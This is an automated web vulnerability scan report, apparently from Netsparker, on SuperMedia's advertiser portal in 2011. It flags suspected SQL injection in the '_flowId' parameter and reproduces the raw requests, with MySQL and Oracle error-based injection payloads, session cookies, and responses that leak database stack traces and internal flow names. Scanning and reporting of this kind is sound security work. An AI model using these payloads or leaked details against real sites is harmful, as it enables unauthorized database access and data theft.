Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, CWE-79, CAPEC-86, JavaScript Injection, www.supermedia.com

Netsparker - Scan Report Summary
TARGET URL
http://www.supermedia.com/spportal/spportalFl...
SCAN DATE
3/19/2011 6:57:06 AM
REPORT DATE
3/19/2011 7:03:13 AM
SCAN DURATION
00:04:32

Total Requests
Average Speed (req/sec.)
18 identified
6 confirmed
7 critical
0 informational

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

CRITICAL 39 %
IMPORTANT 28 %
MEDIUM 6 %
LOW 28 %
[High Possibility] SQL Injection

7 TOTAL
CRITICAL
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as ordinary data. This is an extremely common vulnerability, and its successful exploitation can have critical implications. Although Netsparker believes there is a SQL Injection here, it could not confirm it; there can be numerous reasons why Netsparker is unable to confirm an issue. We strongly recommend investigating the issue manually to ensure that it is a SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us so that we can address it in a future release and give you a more precise result.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attack successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries, which can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review web logs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count..

Parameters

Parameter: _flowId
Type: GET
Value: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6626






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@3ccdf84f targetAction = com.idearc.ssa.web.spring.LoginActAction@e0d3cc7, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;(select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHol..
/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cC9929562-1A32-5057-A587-11DC..

Parameters

Parameter: _flowExecutionKey
Type: GET
Value: _cC9929562-1A32-5057-A587-11DC0A31EA74_kE80D149C-BEB5-3948-9F78-6F4585753F09

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cC9929562-1A32-5057-A587-11DC0A31EA74_kE80D149C-BEB5-3948-9F78-6F4585753F09 HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 12286






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



















<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/form-page.css">
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/spportal/style/ieonly.css" />
<![endif]-->
<script type="text/javascript" src="js/seo.js"></script>
<script language="javascript" src="js/validate.js" type="text/javascript"></script>
<script type="text/javascript" src="js/websites.js"></script>
<script type="text/javascript" src="js/remember.js"></script>
<script language="JavaScript">

var needToConfirm = true;

function confirmExit() {
if(needToConfirm){
return "You haven't finished the set up process, so your changes will not be saved.";
}
}

//submit the form manually to sign in from header
function signinForm(x)
{
if(x=="signin")
document.forms["siginform"]["_eventId_findMore"].name="_eventId_signin";
else
document.forms["siginform"]["_eventId_findMore"].name="_eventId_continue";
document.forms["siginform"].submit();
}
function disblepwd(){
document.siginform.userType[1].checked=true;
}
function checkusername(username){
if(username!=null && inSignInPwd==null){
// alert(username);
document.getElementById("uname").value = "";
}
}
</script>
<style>
span.texttip {
color:#999999;
font-family:Arial,Helvetica,sans-serif;
font-size:11px;
margin-top:10px;
}
</style>


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="getCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/js/%22javascript:closeTooltipWindow()/";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/mbox.js"></script>






























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





<div id="content-shadow" >












<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Account Setup Title";</script>


<style>
.supermedia_form INPUT{

margin-bottom:0px;
}

#howtext,#whytext
{
display:none;margin-top:10px;
}
.right_sidebar_box {background-image: url(images/bkg_rounded_edges.gif) left top no-repeat; padding-top:10px; font-size:11px; line-height:17px; margin-bottom:20px;}
.right_sidebar_box .inner {padding:0 10px 0 5px};
</style>
<div id="everything">
<div id="everything_inner"><!-- EVERYTHING_INNER BEGIN -->
<div class="supermedia_form">
<table cellspacing="0" cellpadding="10" border="0" class="main-table">
<tr>
<td width="720"><!-- LEFT COLUMN BEGIN -->
<h1>Create your online account</h1> <br>






To start using SuperMedia products and services you first need to create an online account.



<form name="accountInfoForm" action="spportalFlow.do" method="post" onsubmit="accountsetupcheckcookie();">
<table width="100%" cellspacing="0" cellpadding="5" border="0">

<tr>
<td colspan="2"><p id="global-error-message" class="inline-error-message">Please address the item(s) highlighted on this page.</p></td>
</tr>



<tr><td colspan="2"><div class="form_bottom_border">&nbsp;</div></td></tr>





<tr><td colspan="2"><h2 class="form_subtitle">Account information</h2></td></tr>
<tr><td class="supermedia_label" width="20%">First Name</td>
<td class="supermedia_input" width="80%">



<p id="customerProfile.firstname-error" class="inline-error-message">First name is a required field </p>


<input type="text" name="customerProfile.firstname" value="" maxlength="30"/>
</td></tr>



<tr><td class="supermedia_label">Last Name</td>
<td class="supermedia_input">



<p id="customerProfile.lastname-error" class="inline-error-message">Last name is a required field </p>


<input type="text" name="customerProfile.lastname" value="" maxlength="30"/>
</td></tr>



<tr>
<td class="supermedia_label">Email Address</td>
<td class="supermedia_input">




<p id="customerProfile.user.username-error" class="inline-error-message">Email Address is a required field </p>


<input class="with-desc" id="account-email" type="text" name="customerProfile.user.username" value="" maxlength="70"/><br>
<span class="texttip"> Email is used to sign in</span></td></tr>




<tr>
<td class="supermedia_label">Password</td>
<td class="supermedia_input" width="80%">





<p id="customerProfile.user.password-error" class="inline-error-message">Please supply a Password </p>


<span id="invalidPwdChar" style="margin-left:0px" class="inline-error-message" >Please enter another password without special characters. Passwords can only include letters and numbers. </span>

<input class="with-desc" type="password" id="pwd" name="customerProfile.user.password" value="" maxlength="32" AUTOCOMPLETE = "off"/><br>
<span class="texttip">Password must be six or more characters, using both letters and numbers, and is case-sensitive.</span></td></tr>





<tr>
<td class="supermedia_label">Retype Password</td>
<td class="supermedia_input" width="80%">



<p id="customerProfile.passwordConfirmation-error" class="inline-error-message">Please retype your password </p>


<input type="password" name="customerProfile.passwordConfirmation" value="" maxlength="32" AUTOCOMPLETE = "off"/></td></tr>


</table>
<table width="100%" cellspacing="0" cellpadding="5" border="0" id="companyInfo" style="padding-left:20px;">

<input type="hidden" id="hideCompanyInfo" value="hideCompanyInfo"/>
<input type="hidden" name="printAcctSubmitInfo" value=""/>

<tr>
<td colspan="2"><div class="form_bottom_border">..
/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=%27%7C%7C(utl_inaddr.get_..

Parameters

Parameter: fromPage
Type: GET
Value: login

Parameter: _flowId
Type: GET
Value: '||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
